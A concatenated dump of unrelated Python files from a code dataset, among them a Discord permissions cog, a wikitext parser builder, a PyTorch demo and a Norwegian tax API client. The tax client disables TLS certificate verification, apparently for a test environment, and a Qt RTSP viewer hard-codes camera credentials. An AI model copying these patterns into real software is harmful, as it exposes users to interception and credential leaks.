\r\n\r\ntags_recom=Tags_recom()\r\n\r\nif __name__==\"__main__\":\r\n filename=\"chardata.html\"\r\n char_data=Character()\r\n char_data.extract_all_char(text_file=filename)\r\n print(char_data.char_data[\"艾雅法拉\"])\r\n \r\n # res=tags_recom.recom([\"狙击干员\",\"辅助干员\", \"削弱\", \"女性干员\", \"治疗\"])\r\n \r\n res=tags_recom.recom([\"近卫\", \"男\", \"支援\"])\r\n print(res)\r\n print(\"=\"*15)\r\n url=\"https://c2cpicdw.qpic.cn/offpic_new/1224067801//39b40a48-b543-4082-986d-f29ee82645d3/0?vuin=2473990407&amp;term=2\"\r\n res=tags_recom.recom(images=[url])\r\n print(res)\r\n \r\n res2=tags_recom.char_data.get_peo_info(\"艾雅法拉\")\r\n print(res2)\r\n \r\n # st=set()\r\n # for name,dic in tags_recom.char_data.char_data.items():\r\n # st=st|set(dic['tags'])\r\n # print(st)\r\n \r\n \r\n\r\n","sub_path":"akaisora/plugins/recom_tags.py","file_name":"recom_tags.py","file_ext":"py","file_size_in_byte":18230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"245089535","text":"import FWCore.ParameterSet.Config as cms\nimport sys\nimport argparse\n\nparser = argparse.ArgumentParser(prog=sys.argv[0], description='Test Run 2 Scouting data formats')\n\nparser.add_argument(\"--muonVersion\", type=int, help=\"muon data format version (default: 3)\", default=3)\nparser.add_argument(\"--trackVersion\", type=int, help=\"track data format version (default: 2)\", default=2)\nparser.add_argument(\"--vertexVersion\", type=int, help=\"vertex data format version (default: 3)\", default=3)\nparser.add_argument(\"--inputFile\", type=str, help=\"Input file name (default: testRun2Scouting.root)\", default=\"testRun2Scouting.root\")\nparser.add_argument(\"--outputFileName\", type=str, help=\"Output file name (default: testRun2Scouting2.root)\", default=\"testRun2Scouting2.root\")\nargv = sys.argv[:]\nif '--' in argv:\n argv.remove(\"--\")\nargs, unknown = parser.parse_known_args(argv)\n\nprocess = cms.Process(\"READ\")\n\nprocess.source = cms.Source(\"PoolSource\", fileNames = cms.untracked.vstring(\"file:\"+args.inputFile))\n\nprocess.testReadRun2Scouting = cms.EDAnalyzer(\"TestReadRun2Scouting\",\n # I stick to values exactly convertable to float\n # to avoid potential rounding issues in the test.\n expectedCaloJetsValues = cms.vdouble(\n 2.0, 4.0 , 6.0, 8.0, 10.0,\n 12.0, 14.0, 16.0, 18.0, 20.0,\n 22.0, 24.0, 26.0, 28.0, 30.0,\n 32.0\n ),\n caloJetsTag = cms.InputTag(\"run2ScoutingProducer\", \"\", \"PROD\"),\n expectedElectronFloatingPointValues = cms.vdouble(\n 10.0, 20.0, 30.0, 40.0, 50.0,\n 60.0, 70.0, 80.0, 90.0, 100.0,\n 110.0, 120.0, 130.0, 140.0\n ),\n expectedElectronIntegralValues = cms.vint32(10, 20),\n electronsTag = cms.InputTag(\"run2ScoutingProducer\", \"\", \"PROD\"),\n muonClassVersion = cms.int32(args.muonVersion),\n expectedMuonFloatingPointValues = cms.vdouble(\n 10.0, 20.0, 30.0, 40.0, 50.0,\n 60.0, 70.0, 80.0, 90.0, 100.0,\n 110.0, 120.0, 130.0, 140.0, 150.0,\n 160.0, 170.0, 180.0, 190.0, 200.0,\n 210.0, 220.0, 230.0\n ),\n expectedMuonIntegralValues = cms.vint32(\n 10, 20, 30, 40, 50,\n 60, 70, 80\n ),\n muonsTag = cms.InputTag(\"run2ScoutingProducer\", \"\", \"PROD\"),\n expectedParticleFloatingPointValues = cms.vdouble(\n 11.0, 21.0, 31.0, 41.0\n ),\n expectedParticleIntegralValues = cms.vint32(\n 11, 21\n ),\n particlesTag = cms.InputTag(\"run2ScoutingProducer\", \"\", \"PROD\"),\n expectedPFJetFloatingPointValues = cms.vdouble(\n 12.0, 22.0, 32.0, 42.0, 52.0,\n 62.0, 72.0, 82.0, 92.0, 102.0,\n 112.0, 122.0, 132.0, 142.0, 152.0\n ),\n expectedPFJetIntegralValues = cms.vint32(\n 12, 22, 32, 42, 52,\n 62, 72, 82\n ),\n pfJetsTag = cms.InputTag(\"run2ScoutingProducer\", \"\", \"PROD\"),\n expectedPhotonFloatingPointValues = cms.vdouble(\n 14.0, 23.0, 33.0, 43.0, 53.0,\n 63.0, 73.0, 83.0\n ),\n photonsTag = cms.InputTag(\"run2ScoutingProducer\", \"\", \"PROD\"),\n trackClassVersion = cms.int32(args.trackVersion),\n expectedTrackFloatingPointValues = cms.vdouble(\n 215.0, 225.0, 235.0, 245.0, 255.0,\n 265.0, 275.0, 285.0, 295.0, 305.0,\n 315.0, 325.0, 335.0, 345.0, 355.0,\n 365.0\n ),\n expectedTrackIntegralValues = cms.vint32(\n 52, 62, 72, 82\n ),\n tracksTag = cms.InputTag(\"run2ScoutingProducer\", \"\", \"PROD\"),\n vertexClassVersion = cms.int32(args.vertexVersion),\n expectedVertexFloatingPointValues = cms.vdouble(\n 15.0, 25.0, 35.0, 45.0, 55.0,\n 65.0, 75.0\n ),\n expectedVertexIntegralValues = cms.vint32(\n 12, 22, 32\n ),\n vertexesTag = cms.InputTag(\"run2ScoutingProducer\", \"\", \"PROD\")\n)\n\nprocess.out = cms.OutputModule(\"PoolOutputModule\",\n fileName = cms.untracked.string(args.outputFileName)\n)\n\nprocess.path = cms.Path(process.testReadRun2Scouting)\n\nprocess.endPath = cms.EndPath(process.out)\n","sub_path":"DataFormats/Scouting/test/test_readRun2Scouting_cfg.py","file_name":"test_readRun2Scouting_cfg.py","file_ext":"py","file_size_in_byte":3965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"467982983","text":"# coding=utf-8\n\"\"\"utility functions or classes for logging operation\"\"\"\nimport logging\n\nlogging.basicConfig(level=logging.INFO, format=\"<%(name)s> [%(levelname)s] %(message)s\")\n\n\ndef get_default_logger(logger_name_, log_file_=None):\n \"\"\"get default logger with given name\"\"\"\n _logger = logging.getLogger(logger_name_)\n if log_file_:\n _file_handler = logging.FileHandler(log_file_)\n _logger.addHandler(_file_handler)\n return _logger\n","sub_path":"logger_utils.py","file_name":"logger_utils.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"117314555","text":"import functools\nimport typing\n\nimport discord\nfrom discord.ext import commands\n\n\ndef check_perm_exists(func):\n @functools.wraps(func)\n async def wrapper(self, ctx, name, *args):\n if name not in self.bot.perm.registered_permissions:\n await ctx.send(f\"Permission **{name}** does not exist.\")\n return\n\n await func(self, ctx, name, *args)\n\n return wrapper\n\n\ndef _id_to_string(guild, id):\n if id == guild.id:\n return \"@everyone\"\n\n role = guild.get_role(id)\n\n if role is not None:\n return f\"@{role.name}\"\n\n member = guild.get_member(id)\n\n if member is not None:\n return f\"{member}\"\n\n return f\"@{id}\"\n\n\ndef _perm_to_string(perm, guild):\n roleids = [role.id for role in reversed(guild.roles)]\n string = f\"{perm.pretty_name}:\"\n\n defs = perm.definitions(guild)\n\n # List user permissions\n for id, state in defs.items():\n if id in roleids:\n continue\n\n string += f\"\\n - {'Granted' if state else 'Denied'} for {_id_to_string(guild, id)}\"\n\n # List role permissions (in order)\n for id in roleids:\n if id not in defs:\n continue\n\n string += f\"\\n - {'Granted' if defs[id] else 'Denied'} for {_id_to_string(guild, id)}\"\n\n if isinstance(perm.base, str):\n string += f\"\\n - Fallback permission: '{perm.base}' (if none of the above rules match)\"\n else:\n string += f\"\\n - {'Granted' if perm.base is True else 'Denied'} by default (if none of the above rules match)\"\n\n return string\n\n\nclass RoleConverterExt(commands.RoleConverter):\n async def convert(self, ctx, argument):\n if argument == 'everyone':\n return ctx.guild.get_role(ctx.guild.id)\n\n return await super().convert(ctx, argument)\n\n\nclass DBotPerm(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.group(aliases=[\"pm\", \"permission\", \"permissions\"], invoke_without_command=True)\n @commands.has_permissions(administrator=True)\n async def perm(self, ctx):\n \"\"\"Manages the bot-specific permissions\"\"\"\n\n await ctx.send_help(ctx.command)\n return\n\n @perm.command(name=\"list\")\n @commands.has_permissions(administrator=True)\n async def perm_list(self, ctx):\n \"\"\"Lists all available permissions\"\"\"\n\n entries = []\n\n for permname in sorted(self.bot.perm.registered_permissions):\n perm = self.bot.perm.get(permname)\n entries.append({'name': perm.name, 'description': perm.pretty_name})\n\n if len(entries) == 0:\n await ctx.send(\"There aren't any registered permissions.\")\n return\n\n await self.bot.send_table(ctx, [\"name\", \"description\"], entries)\n\n @perm.command(name=\"get\", aliases=[\"show\"])\n @commands.has_permissions(administrator=True)\n @check_perm_exists\n async def perm_get(self, ctx, name):\n \"\"\"Retrieves information about a permission\"\"\"\n\n perm = self.bot.perm.get(name)\n await ctx.send(f\"```{_perm_to_string(perm, ctx.guild)}```\")\n\n @perm.command(name=\"grant\", aliases=[\"allow\"])\n @commands.has_permissions(administrator=True)\n @check_perm_exists\n async def perm_grant(self, ctx, permission, target: typing.Union[RoleConverterExt, discord.Member]):\n \"\"\"Grants a permission to a user or role\"\"\"\n\n perm = self.bot.perm.get(permission)\n perm.grant(ctx.guild, target.id)\n\n await ctx.message.add_reaction('\\U00002705')\n\n @perm.command(name=\"deny\", aliases=[\"disallow\"])\n @commands.has_permissions(administrator=True)\n @check_perm_exists\n async def perm_deny(self, ctx, permission, target: typing.Union[RoleConverterExt, discord.Member]):\n \"\"\"Denies a permission to a user or role\"\"\"\n\n perm = self.bot.perm.get(permission)\n perm.deny(ctx.guild, target.id)\n\n await ctx.message.add_reaction('\\U00002705')\n\n @perm.command(name=\"default\", aliases=[\"reset\"])\n @commands.has_permissions(administrator=True)\n @check_perm_exists\n async def perm_default(self, ctx, permission, target: typing.Union[RoleConverterExt, discord.Member]):\n \"\"\"Resets a permission to default for a user or role\"\"\"\n\n perm = self.bot.perm.get(permission)\n perm.default(ctx.guild, target.id)\n\n await ctx.message.add_reaction('\\U00002705')\n\n\ndef setup(bot):\n bot.add_cog(DBotPerm(bot))\n","sub_path":"basedbot/cogs/dbotperm.py","file_name":"dbotperm.py","file_ext":"py","file_size_in_byte":4380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"90236802","text":"import random\nimport torch\n\n\nclass DynamicNet(torch.nn.Module):\n def __init__(self, D_in, H, D_out):\n super(DynamicNet, self).__init__()\n self.input_linear = torch.nn.Linear(D_in, H)\n self.middle_linear = torch.nn.Linear(H, H)\n self.output_linear = torch.nn.Linear(H, D_out)\n\n def forward(self, inputs):\n h_relu = self.input_linear(x).clamp(min=0)\n for i in range(random.randint(0, 10)):\n h_relu = self.middle_linear(h_relu).clamp(min=0)\n print('!', end='')\n print()\n y_pred = self.output_linear(h_relu)\n return y_pred\n\nN, D_in, H, D_out = 64, 1000, 100, 10\n\nx = torch.randn(N, D_in)\ny = torch.randn(N, D_out)\n\nmodel = DynamicNet(D_in, H, D_out)\n\ncriteria = torch.nn.MSELoss(reduction='sum')\nopt = torch.optim.SGD(model.parameters(), lr=1e-4, momentum=0.9)\n\nfor t in range(500):\n y_pred = model(x)\n\n loss = criteria(y_pred, y)\n print(t, loss.item())\n\n opt.zero_grad()\n loss.backward()\n opt.step()\n","sub_path":"control_flow.py","file_name":"control_flow.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"218718366","text":"from skatteetaten_api import main_relay\nimport requests\nfrom pathlib import Path\n\n# Slå av sertifikat verifikasjon i test\nimport urllib3\nurllib3.disable_warnings()\n\nALTINN_URL = \"https://skd.apps.tt02.altinn.no\"\n\ndef hent_altinn_token(idporten_token: dict) -> dict:\n altinn3 = \"https://platform.tt02.altinn.no/authentication/api/v1/exchange/id-porten\"\n r = requests.get(altinn3, headers=idporten_token, verify=False)\n r.raise_for_status()\n altinn_header = {\"Authorization\": \"Bearer \" + r.text}\n print(altinn_header)\n return altinn_header\n\n\ndef hent_party_id(token: dict, appnavn: str = \"skd/sirius-skattemelding-v1\") -> str:\n url = f\"{ALTINN_URL}/{appnavn}/api/v1/profile/user\"\n r = requests.get(url, headers=token, verify=False)\n r.raise_for_status()\n return str(r.json()[\"partyId\"])\n\n\ndef opprett_ny_instans(header: dict, fnr: str, appnavn: str = \"skd/sirius-skattemelding-v1\") -> dict:\n payload = {\n \"instanceOwner\": {\n \"personNumber\": fnr\n },\n \"appOwner\": {\n \"labels\": [\"gr\", \"x2\"]\n },\n \"appId\": appnavn,\n \"dueBefore\": \"2020-06-01T12:00:00Z\",\n \"visibleAfter\": \"2019-05-20T00:00:00Z\",\n \"title\": {\"nb\": \"Skattemelding\"}\n }\n url = f\"{ALTINN_URL}/{appnavn}/instances/\"\n r = requests.post(url, headers=header, json=payload, verify=False)\n r.raise_for_status()\n return r.json()\n\n\ndef last_opp_metadata(instans_data: dict, token: dict, xml: str = None, appnavn: str = \"skd/sirius-skattemelding-v1\") -> None:\n id = instans_data['id']\n data_id = instans_data['data'][0]['id']\n\n url = f\"{ALTINN_URL}/{appnavn}/instances/{id}/data/{data_id}\"\n token[\"content-type\"] = \"application/xml\"\n r = requests.put(url, data=xml, headers=token, verify=False)\n r.raise_for_status()\n return r\n\ndef last_opp_metadata_json(instans_data: dict, token: dict, inntektsaar: int = 2021, appnavn: str = \"skd/sirius-skattemelding-v2\") -> None:\n id = instans_data['id']\n data_id = instans_data['data'][0]['id']\n\n url = f\"{ALTINN_URL}/{appnavn}/instances/{id}/data/{data_id}\"\n token[\"content-type\"] = \"application/json\"\n payload = {\"inntektsaar\": inntektsaar}\n r = requests.put(url, json=payload, headers=token, verify=False)\n r.raise_for_status()\n return r\n\n\ndef last_opp_skattedata(instans_data: dict, token: dict, xml: str,\n data_type: str =\"skattemelding\",\n appnavn: str = \"skd/sirius-skattemelding-v1\") -> None:\n url = f\"{ALTINN_URL}/{appnavn}/instances/{instans_data['id']}/data?dataType={data_type}\"\n token[\"content-type\"] = \"text/xml\"\n token[\"Content-Disposition\"] = \"attachment; filename=skattemelding.xml\"\n\n r = requests.post(url, data=xml, headers=token, verify=False)\n return r\n\n\ndef last_opp_vedlegg(instans_data: dict, token: dict, vedlegg_fil, content_type: str,\n data_type=\"skattemelding-vedlegg\",\n appnavn: str = \"skd/sirius-skattemelding-v1\") -> requests:\n\n url = f\"{ALTINN_URL}/{appnavn}/instances/{instans_data['id']}/data?dataType={data_type}\"\n filnavn = Path(vedlegg_fil).name\n token[\"content-type\"] = content_type\n token[\"Content-Disposition\"] = f\"attachment; filename={filnavn}\"\n\n with open(vedlegg_fil, 'rb') as f:\n vedlegg_blob = f.read()\n\n r = requests.post(url, data=vedlegg_blob, headers=token, verify=False)\n r.raise_for_status()\n return r\n\n\ndef endre_prosess_status(instans_data: dict, token: dict, neste_status: str, appnavn: str = \"skd/sirius-skattemelding-v1\") -> str:\n if neste_status not in [\"start\", \"next\", \"completeProcess\"]:\n raise NotImplementedError\n\n url = f\"{ALTINN_URL}/{appnavn}/instances/{instans_data['id']}/process/{neste_status}\"\n r = requests.put(url, headers=token, verify=False)\n r.raise_for_status()\n return r.text\n\n\nif __name__ == '__main__':\n print(\"Dette er en rekke med metoder jupyter notebook applikasjonen bruker\")\n","sub_path":"docs/test/testinnsending/altinn3.py","file_name":"altinn3.py","file_ext":"py","file_size_in_byte":3972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"424867280","text":"#!/usr/bin/env python3\n\nimport os\nimport pandas as pd\nfrom torch.utils.data import Dataset\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport torch\n\nclass RirnetDatabase(Dataset):\n \"\"\" Data-Target dataset to use with rirnet\"\"\"\n\n def __init__(self, is_training, args, data_transform=None, target_transform=None):\n if is_training:\n csv_file = args.train_db_path\n else:\n csv_file = args.val_db_path\n\n database = pd.read_csv(csv_file) #, nrows = 1000)\n\n self.n_peaks = args.n_peaks\n self.dataset = database\n self.data_transform = data_transform\n self.target_transform = target_transform\n\n def __len__(self):\n return len(self.dataset)\n\n\n def __getitem__(self, idx):\n data_path = self.dataset.iloc[idx, 2]\n target_path = self.dataset.iloc[idx, 1]\n data = np.load(data_path)\n target = np.load(target_path)\n order = np.argsort(target[0])\n target = target[:, order]\n permute = np.random.permutation(range(self.n_peaks))\n\n if self.data_transform and self.target_transform:\n data = self.data_transform(data)\n target = self.target_transform(target)[:, :self.n_peaks]\n #target = target[:, permute]\n #target += torch.rand(2,1)\n return data, target\n","sub_path":"signalnet/rirnet/rirnet_database.py","file_name":"rirnet_database.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"135123724","text":"# Three-Sum Problem\n\nthe_list = [0, 0, 0, 7, -3, -4, 10, -3, -7, 8, -4, -4]\n\nlist_length = len(the_list)\nunique_triples = []\n\nprint('These are the true things:')\nfor x in range(0, list_length):\n\tthing_1 = the_list[x]\n\tfor y in range(x + 1, list_length):\n\t\tthing_2 = the_list[y]\n\t\tfor z in range(y + 1, list_length):\n\t\t\tthing_3 = the_list[z]\n\t\t\tthe_result = thing_1 + thing_2 + thing_3 == 0\n\t\t\tif the_result == True:\n\t\t\t\ttriple = {thing_1, thing_2, thing_3}\n\t\t\t\tif triple not in unique_triples:\n\t\t\t\t\tunique_triples.append(triple)\n\t\t\t\t\toutput = '{} and {} and {}'.format(thing_1, thing_2, thing_3, the_result)\n\t\t\t\t\tprint(output)\n\n______________________\n# Semi-related recursive stuff\n# 1! = 1\n# 2! = 2*1\n# 3! = 3*2*1\n# 4! = 4*3*2*1\n# 5! = 5*4*3*2*1\n# 6! = 6*5*4*3*2*1\n\n# def factorial(n):\n# \tif n == 1:\n# \t\treturn 1\n# \telse:\n# \t\treturn n * factorial(n - 1)\n\n\n\n\n\t\n","sub_path":"level-2/class2/class2.py","file_name":"class2.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"107124456","text":"# -*- coding: utf-8 -*-\n#\n# Copyright (C) 2012-2014 Ben Kurtovic \n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\nfrom __future__ import unicode_literals\n\nfrom . import tokens\nfrom ..compat import str\nfrom ..nodes import (Argument, Comment, ExternalLink, Heading, HTMLEntity, Tag,\n Template, Text, Wikilink)\nfrom ..nodes.extras import Attribute, Parameter\nfrom ..smart_list import SmartList\nfrom ..wikicode import Wikicode\n\n__all__ = [\"Builder\"]\n\nclass Builder(object):\n \"\"\"Combines a sequence of tokens into a tree of ``Wikicode`` objects.\n\n To use, pass a list of :py:class:`~.Token`\\ s to the :py:meth:`build`\n method. The list will be exhausted as it is parsed and a\n :py:class:`~.Wikicode` object will be returned.\n \"\"\"\n\n def __init__(self):\n self._tokens = []\n self._stacks = []\n\n def _wrap(self, nodes):\n \"\"\"Properly wrap a list of nodes in a ``Wikicode`` object.\"\"\"\n return Wikicode(SmartList(nodes))\n\n def _push(self):\n \"\"\"Push a new node list onto the stack.\"\"\"\n self._stacks.append([])\n\n def _pop(self, wrap=True):\n \"\"\"Pop the current node list off of the stack.\n\n If *wrap* is ``True``, we will call :py:meth:`_wrap` on the list.\n \"\"\"\n if wrap:\n return self._wrap(self._stacks.pop())\n return self._stacks.pop()\n\n def _write(self, item):\n \"\"\"Append a node to the current node list.\"\"\"\n self._stacks[-1].append(item)\n\n def _handle_parameter(self, default):\n \"\"\"Handle a case where a parameter is at the head of the tokens.\n\n *default* is the value to use if no parameter name is defined.\n \"\"\"\n key = None\n showkey = False\n self._push()\n while self._tokens:\n token = self._tokens.pop()\n if isinstance(token, tokens.TemplateParamEquals):\n key = self._pop()\n showkey = True\n self._push()\n elif isinstance(token, (tokens.TemplateParamSeparator,\n tokens.TemplateClose)):\n self._tokens.append(token)\n value = self._pop()\n if key is None:\n key = self._wrap([Text(str(default))])\n return Parameter(key, value, showkey)\n else:\n self._write(self._handle_token(token))\n\n def _handle_template(self):\n \"\"\"Handle a case where a template is at the head of the tokens.\"\"\"\n params = []\n default = 1\n self._push()\n while self._tokens:\n token = self._tokens.pop()\n if isinstance(token, tokens.TemplateParamSeparator):\n if not params:\n name = self._pop()\n param = self._handle_parameter(default)\n params.append(param)\n if not param.showkey:\n default += 1\n elif isinstance(token, tokens.TemplateClose):\n if not params:\n name = self._pop()\n return Template(name, params)\n else:\n self._write(self._handle_token(token))\n\n def _handle_argument(self):\n \"\"\"Handle a case where an argument is at the head of the tokens.\"\"\"\n name = None\n self._push()\n while self._tokens:\n token = self._tokens.pop()\n if isinstance(token, tokens.ArgumentSeparator):\n name = self._pop()\n self._push()\n elif isinstance(token, tokens.ArgumentClose):\n if name is not None:\n return Argument(name, self._pop())\n return Argument(self._pop())\n else:\n self._write(self._handle_token(token))\n\n def _handle_wikilink(self):\n \"\"\"Handle a case where a wikilink is at the head of the tokens.\"\"\"\n title = None\n self._push()\n while self._tokens:\n token = self._tokens.pop()\n if isinstance(token, tokens.WikilinkSeparator):\n title = self._pop()\n self._push()\n elif isinstance(token, tokens.WikilinkClose):\n if title is not None:\n return Wikilink(title, self._pop())\n return Wikilink(self._pop())\n else:\n self._write(self._handle_token(token))\n\n def _handle_external_link(self, token):\n \"\"\"Handle when an external link is at the head of the tokens.\"\"\"\n brackets, url = token.brackets, None\n self._push()\n while self._tokens:\n token = self._tokens.pop()\n if isinstance(token, tokens.ExternalLinkSeparator):\n url = self._pop()\n self._push()\n elif isinstance(token, tokens.ExternalLinkClose):\n if url is not None:\n return ExternalLink(url, self._pop(), brackets)\n return ExternalLink(self._pop(), brackets=brackets)\n else:\n self._write(self._handle_token(token))\n\n def _handle_entity(self):\n \"\"\"Handle a case where an HTML entity is at the head of the tokens.\"\"\"\n token = self._tokens.pop()\n if isinstance(token, tokens.HTMLEntityNumeric):\n token = self._tokens.pop()\n if isinstance(token, tokens.HTMLEntityHex):\n text = self._tokens.pop()\n self._tokens.pop() # Remove HTMLEntityEnd\n return HTMLEntity(text.text, named=False, hexadecimal=True,\n hex_char=token.char)\n self._tokens.pop() # Remove HTMLEntityEnd\n return HTMLEntity(token.text, named=False, hexadecimal=False)\n self._tokens.pop() # Remove HTMLEntityEnd\n return HTMLEntity(token.text, named=True, hexadecimal=False)\n\n def _handle_heading(self, token):\n \"\"\"Handle a case where a heading is at the head of the tokens.\"\"\"\n level = token.level\n self._push()\n while self._tokens:\n token = self._tokens.pop()\n if isinstance(token, tokens.HeadingEnd):\n title = self._pop()\n return Heading(title, level)\n else:\n self._write(self._handle_token(token))\n\n def _handle_comment(self):\n \"\"\"Handle a case where an HTML comment is at the head of the tokens.\"\"\"\n self._push()\n while self._tokens:\n token = self._tokens.pop()\n if isinstance(token, tokens.CommentEnd):\n contents = self._pop()\n return Comment(contents)\n else:\n self._write(self._handle_token(token))\n\n def _handle_attribute(self, start):\n \"\"\"Handle a case where a tag attribute is at the head of the tokens.\"\"\"\n name, quoted = None, False\n self._push()\n while self._tokens:\n token = self._tokens.pop()\n if isinstance(token, tokens.TagAttrEquals):\n name = self._pop()\n self._push()\n elif isinstance(token, tokens.TagAttrQuote):\n quoted = True\n elif isinstance(token, (tokens.TagAttrStart, tokens.TagCloseOpen,\n tokens.TagCloseSelfclose)):\n self._tokens.append(token)\n if name:\n value = self._pop()\n else:\n name, value = self._pop(), None\n return Attribute(name, value, quoted, start.pad_first,\n start.pad_before_eq, start.pad_after_eq)\n else:\n self._write(self._handle_token(token))\n\n def _handle_tag(self, token):\n \"\"\"Handle a case where a tag is at the head of the tokens.\"\"\"\n close_tokens = (tokens.TagCloseSelfclose, tokens.TagCloseClose)\n implicit, attrs, contents, closing_tag = False, [], None, None\n wiki_markup, invalid = token.wiki_markup, token.invalid or False\n self._push()\n while self._tokens:\n token = self._tokens.pop()\n if isinstance(token, tokens.TagAttrStart):\n attrs.append(self._handle_attribute(token))\n elif isinstance(token, tokens.TagCloseOpen):\n padding = token.padding or \"\"\n tag = self._pop()\n self._push()\n elif isinstance(token, tokens.TagOpenClose):\n contents = self._pop()\n self._push()\n elif isinstance(token, close_tokens):\n if isinstance(token, tokens.TagCloseSelfclose):\n tag = self._pop()\n self_closing = True\n padding = token.padding or \"\"\n implicit = token.implicit or False\n else:\n self_closing = False\n closing_tag = self._pop()\n return Tag(tag, contents, attrs, wiki_markup, self_closing,\n invalid, implicit, padding, closing_tag)\n else:\n self._write(self._handle_token(token))\n\n def _handle_token(self, token):\n \"\"\"Handle a single token.\"\"\"\n if isinstance(token, tokens.Text):\n return Text(token.text)\n elif isinstance(token, tokens.TemplateOpen):\n return self._handle_template()\n elif isinstance(token, tokens.ArgumentOpen):\n return self._handle_argument()\n elif isinstance(token, tokens.WikilinkOpen):\n return self._handle_wikilink()\n elif isinstance(token, tokens.ExternalLinkOpen):\n return self._handle_external_link(token)\n elif isinstance(token, tokens.HTMLEntityStart):\n return self._handle_entity()\n elif isinstance(token, tokens.HeadingStart):\n return self._handle_heading(token)\n elif isinstance(token, tokens.CommentStart):\n return self._handle_comment()\n elif isinstance(token, tokens.TagOpenOpen):\n return self._handle_tag(token)\n\n def build(self, tokenlist):\n \"\"\"Build a Wikicode object from a list tokens and return it.\"\"\"\n self._tokens = tokenlist\n self._tokens.reverse()\n self._push()\n while self._tokens:\n node = self._handle_token(self._tokens.pop())\n self._write(node)\n return self._pop()\n","sub_path":"mwparserfromhell/parser/builder.py","file_name":"builder.py","file_ext":"py","file_size_in_byte":11434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"523326822","text":"import cv2\nimport sys\n\nfrom PySide2.QtCore import QThread, Signal, Slot\nfrom PySide2.QtGui import QImage, Qt, QPixmap, QCloseEvent, QMouseEvent\nfrom PySide2.QtWidgets import QWidget, QLabel, QApplication, QGridLayout, QStatusBar, QMainWindow\n\n\n# TODO remove this ugliness... Qt is not good for this.\n\nclass ImageUpdater(QThread):\n update = Signal(QImage)\n\n def __init__(self, rtsp_url: str, parent=None):\n super().__init__(parent)\n self._max_fps = 60\n self._is_running = False\n self.capture = cv2.VideoCapture(\n f\"rtspsrc location=\\\"{rtsp_url}\\\" ! rtph264depay ! h264parse ! avdec_h264 ! autovideoconvert ! appsink\",\n cv2.CAP_GSTREAMER\n )\n\n def stop(self):\n self._is_running = False\n self.wait()\n\n def run(self):\n self.msleep(1000)\n self._is_running = True\n while self._is_running:\n result, frame = self.capture.read()\n if result:\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n h, w, ch = frame.shape\n bytes_per_line = ch * w\n converted = QImage(frame.data, w, h, bytes_per_line, QImage.Format_RGB888)\n self.update.emit(converted)\n self.msleep(int(1000 / self._max_fps))\n\n\nclass ImageWidget(QLabel):\n mouse_move = Signal(float, float)\n\n def __init__(self, loading_text: str, scale_factor=1.0, parent=None):\n super().__init__(loading_text, parent=parent)\n self.scale_factor = scale_factor\n\n def mouseMoveEvent(self, event: QMouseEvent):\n self.mouse_move.emit(event.x(), event.y())\n\n @Slot(QImage)\n def update_image(self, image: QImage):\n pix_map = QPixmap.fromImage(image)\n pix_map = pix_map.scaled(\n int(image.width() * self.scale_factor),\n int(image.height() * self.scale_factor),\n Qt.AspectRatioMode.KeepAspectRatio\n )\n self.setPixmap(pix_map)\n\n\nclass MainWindow(QMainWindow):\n def __init__(self, rtsp_url: str, parent=None):\n super().__init__(parent)\n self.image_updater = ImageUpdater(rtsp_url, self)\n\n self.status_bar = QStatusBar()\n self.setStatusBar(self.status_bar)\n\n self.position_label = QLabel(\"X: -, Y: -\")\n self.status_bar.addWidget(self.position_label)\n\n self.central_widget = QWidget()\n\n self.main_grid = QGridLayout()\n self.secondary_grid = QGridLayout()\n self.main_grid.addLayout(self.secondary_grid, 0, 0)\n\n self.main_image = ImageWidget(\"Connecting...\", 0.7)\n self.main_image.mouse_move.connect(lambda x, y: self.position_label.setText(f\"X: {x}, Y: {y}\"))\n self.main_grid.addWidget(self.main_image, 0, 1)\n\n self.roi_image = QLabel(\"No image data\")\n self.secondary_grid.addWidget(self.roi_image, 0, 0)\n\n self.central_widget.setLayout(self.main_grid)\n self.setCentralWidget(self.central_widget)\n self.resize(1600, 800)\n self.setWindowTitle('Parking statistics')\n self.show()\n\n self.image_updater.update.connect(self.main_image.update_image, Qt.QueuedConnection)\n self.image_updater.start()\n\n def closeEvent(self, event: QCloseEvent):\n self.image_updater.stop()\n event.accept()\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n window = MainWindow(\"rtsp://admin:123@192.168.1.106:554/onvif1\")\n 